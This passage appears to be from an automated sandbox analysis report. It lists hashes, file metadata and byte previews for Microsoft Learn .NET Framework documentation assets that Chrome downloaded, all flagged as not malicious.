                                                                                                                                                                                                                            Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):1154
                                                                                                                                                                                                                            Entropy (8bit):4.59126408969148
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                                            MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                                            SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                                            SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                                            SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                                                            Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33019), with no line terminators
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):33019
                                                                                                                                                                                                                            Entropy (8bit):4.916265462750225
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUcF:5hOEO8chkMet7pCjBfcHkWOzUcF
                                                                                                                                                                                                                            MD5:17339002B4DE90FC5EA0710CA49160CA
                                                                                                                                                                                                                            SHA1:AE771FFC398F8FA8C934FF05A9EBD6CB6D14BA9C
                                                                                                                                                                                                                            SHA-256:D81C792435B93CBAA9A54F59D538121D2EE33B4446359A31D3998D769341F555
                                                                                                                                                                                                                            SHA-512:15127FD515FD2CD55634EEDA71C4F2C96980E6FC51D169771484169104924A176D9387D792D08C7623AC3A44BCF9A00D2DADD6040417892ADB4A542C47B18F2C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                                                            Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):35005
                                                                                                                                                                                                                            Entropy (8bit):7.980061050467981
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                                            MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                                            SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                                            SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                                            SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13842
                                                                                                                                                                                                                            Entropy (8bit):7.802399161550213
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                                            MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                                            SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                                            SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                                            SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4897
                                                                                                                                                                                                                            Entropy (8bit):4.794639101874543
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzVqrpCvJ4QG63JjJ+do88HxbqP:dgQ+KfZcbhaWjp45qtAdflfDOFnNgBy4
                                                                                                                                                                                                                            MD5:84E6C95F0E5378BDA94FA965C4692FAF
                                                                                                                                                                                                                            SHA1:7C1D6572906509B08F8CD7B7A33EB9F9697EE6D1
                                                                                                                                                                                                                            SHA-256:88A4A7B4F1160F8CAD3EB835116C29AC39659D586D4DADC54D9E40AC7E1BC610
                                                                                                                                                                                                                            SHA-512:D34BFF37F8402B4A1FEE3C26F247A86D72666647A10E83D711A1BED1D24C6FC13674D65DCC037C22811B227FEC34B5DE20442191A42F9D78FC79D55FD5792761
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):47062
                                                                                                                                                                                                                            Entropy (8bit):5.016163005462754
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:haAr16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hThGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                                                            MD5:CE04944CBC44667A8111D79ED33CE4E2
                                                                                                                                                                                                                            SHA1:591A96C680FC9FDC4B95F030BF74FD7907C6A4FE
                                                                                                                                                                                                                            SHA-256:98DBE54D7E61955477ED83095A24ED2A49930B282D86CFBFBD36F8F3D87FB14C
                                                                                                                                                                                                                            SHA-512:C419AE6E1EB66E7C3221CA7B6AAF87156813F8A0A5D650EF2D89FD236DE9AFD97FDE4A6B39266DD593899DF58C4FE4B1CECBE5909D791C409824ECD9666E91E1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                            Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):3130
                                                                                                                                                                                                                            Entropy (8bit):4.790069981348324
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                                            MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                                            SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                                            SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                                            SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                                                            Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):18367
                                                                                                                                                                                                                            Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                                            MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                                            SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                                            SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                                            SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13339
                                                                                                                                                                                                                            Entropy (8bit):7.683569563478597
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                                            MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                                            SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                                            SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                                            SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):18367
                                                                                                                                                                                                                            Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                                            MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                                            SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                                            SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                                            SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1154
                                                                                                                                                                                                                            Entropy (8bit):4.59126408969148
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                                            MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                                            SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                                            SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                                            SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3130
                                                                                                                                                                                                                            Entropy (8bit):4.790069981348324
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                                            MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                                            SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                                            SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                                            SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):15427
                                                                                                                                                                                                                            Entropy (8bit):7.784472070227724
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                                            MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                                            SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                                            SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                                            SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                                            Malicious:false
